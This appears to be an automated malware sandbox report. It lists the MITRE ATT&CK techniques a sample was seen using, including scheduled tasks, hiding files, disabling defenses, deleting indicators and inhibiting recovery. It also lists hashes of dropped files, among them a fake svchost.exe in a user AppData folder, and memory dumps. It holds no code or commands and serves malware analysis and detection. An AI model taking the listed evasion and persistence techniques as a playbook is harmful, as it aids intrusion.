Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\715946058.pri

Filesize
171KB

MD5
30ec43ce86e297c1ee42df6209f5b18f

SHA1
fe0a5ea6566502081cb23b2f0e91a3ab166aeed6

SHA256
8ccddf0c77743a42067782bc7782321330406a752f58fb15fb1cd446e1ef0ee4

SHA512
19e5a7197a92eeef0482142cfe0fb46f16ddfb5bf6d64e372e7258fa6d01cf9a1fac9f7258fd2fd73c0f8a064b8d79b51a1ec6d29bbb9b04cdbd926352388bae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\2290032291.pri

Filesize
2KB

MD5
b8da5aac926bbaec818b15f56bb5d7f6

SHA1
2b5bf97cd59e82c7ea96c31cf9998fbbf4884dc5

SHA256
5be5216ae1d0aed64986299528f4d4fe629067d5f4097b8e4b9d1c6bcf4f3086

SHA512
c39a28d58fb03f4f491bf9122a86a5cbe7677ec2856cf588f6263fa1f84f9ffc1e21b9bcaa60d290356f9018fb84375db532c8b678cf95cc0a2cc6ed8da89436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
929e860c5b7e9cec83a622fcfd0349d2

SHA1
5052a3fad6546b26d8536ec3377e31946e0acb35

SHA256
55b4ad31d2cc299e1819512d4e86d39978b67fb711ef10d909746a6ed8783bbf

SHA512
2ae18278dc567f141f260d962aabe9dba46a2259bef2fd9c3c29549950ec87fd68adf37acb71acb6ece1d9503dc60733656988e640a0a6873becf6c61fe81244

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1352fb08cf60b98b878c7339aca43d55

SHA1
e142a79632f2a9af8c0b08234ee6546044242cc6

SHA256
ea38a095204163e757e1651ba91e12a838596439133f5fe10ec25bc62835cd87

SHA512
77ebdd62a59e27894bd91d1a7a0e8b84d5936504396f1b20ff745353f9dbea94b7b07aab8dadfdf15a73c56292533bd54f643a73525e2fb65ab4f44fb4d3ec7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1e41198beccc226d287d0ee1f54459aa

SHA1
aedca1b8ec4180dba03a7ddc6ef12d8254d393f0

SHA256
a3d82d38511e2cfead13bb895b33f8e2a1d28d1248825defcaa6058e6e20c1e3

SHA512
c06bbf5d4568e312c204b05b47445deb2e5dae10661b9da6f5054e27d60336f45bbb6d498e968902f1aa3f3559a334dea70343b51b3c2fc7420495ee5dae4d42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9dbc55570c6a0dd9d7dd07f6db15991e

SHA1
7eb6e41b96934c3f927290a90f650b0f3eaa8b5f

SHA256
28e747a21ceac52911a7a2ded7c8243e2cb55b28e2e93dbc526dc7233a06f81d

SHA512
da2fc8028fec4c9ce924a317e897facad41ce46bda3eb4454c8bb3c55dca88f7f01466b97d397ab9697e69bc30723b2eefdeff95c9e1547577cc81d7935ad55f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c54cce23e8e92aa511003c412c5f5089

SHA1
ba63e56ba1da2472d18b050b50c3bce52afe0958

SHA256
39b2d1a1fdab056182c372f81998cdc237fe52f9de59dc5bc000512be8434038

SHA512
8008682103b5f6011aa78f149a9e4c369d407165f3fcc304b4081894640be878d3729bd593ee99cfb090b66c5f937147cd7ef0f0c5d6d40cf8705f94ab9ecf44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d1c31a5761a4e179f2f9ca05c69648ea

SHA1
9014edbc18cdaeae68ebaea1b7d43efc0a303b6f

SHA256
fb2ddd3a2a48093c7e8c36ecd960510bf9e1ab93ad9798495d9ed2bdc1c7d412

SHA512
65808f5d2c0b0fe99606f944f548392aeb4d3a4d848922f9e69f5fc86c8bd9d06ad00bf4df0d70e0f13426e64e25843b6f75ee61384e3971a60ec7ad6bfc4e4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5320782f355d9abf2bbbc49819f5917a

SHA1
fea469b76ab94258b25bea3887fc11efe80b40b8

SHA256
10fb0a7d8875c8b3f5ee6ca5143de06832bc572164b4e250f922dc93d302f8b8

SHA512
c1d6ad13f1bb54e72576d82f59ea293ada4145a5bf9dc17c35d38d5c2fca5b114270dc61277e69b0f2c3e7f3cf70de4dbc3e7be3f0551b0b0da5c3b08bebdee3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5d1b688b15490bbab32b1c290c149c18

SHA1
1b9f28710e8e18adf2835aac22df830443ea882f

SHA256
203a1b2e0374cae759867a6039a808bb94f16ab80fce5534a6dd6c00ff49fc18

SHA512
6f5dc73ee402e5653e96e0763bbfdeb930c95c29a17dde0a036a20771dbe367d33a81f12c898c7ad94d81fa95cf645fb53b9e9c5e7ff671af8675f5700da4d1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fb75f30f942ccc591174828552106c25

SHA1
3f487ec629fc80a2c2c3819e1cce71deef091559

SHA256
887721eb760a125f1e7d205261112791a664f6e9d763d0aafc36d7f8aed45647

SHA512
b0877cbc359b34fd90177136b347bdb423ff122082cd2c9d6146b259c01d9f3377b850891b2874b00be2e1058f3e58cb0f1d5d5de78b6de85744289c2d5937b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ytgigfw1.u5h.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

Filesize
240KB

MD5
16deda7a7a2e8f354fbff30ad723a711

SHA1
8730e18a2fc9722f7700c1192b3cc941169d7701

SHA256
4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e

SHA512
6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

Download Submit
memory/748-0-0x00007FF983743000-0x00007FF983744000-memory.dmp

Filesize
4KB

Download
memory/748-7-0x00007FF983740000-0x00007FF98412C000-memory.dmp

Filesize
9.9MB

Download
memory/748-1-0x000002A481F60000-0x000002A481FA2000-memory.dmp

Filesize
264KB

Download
memory/748-547-0x00007FF983743000-0x00007FF983744000-memory.dmp

Filesize
4KB

Download
memory/748-553-0x00007FF983740000-0x00007FF98412C000-memory.dmp

Filesize
9.9MB

Download
memory/2880-15-0x0000021669870000-0x00000216698E6000-memory.dmp

Filesize
472KB

Download
memory/2880-12-0x00000216696C0000-0x00000216696E2000-memory.dmp

Filesize
136KB

Download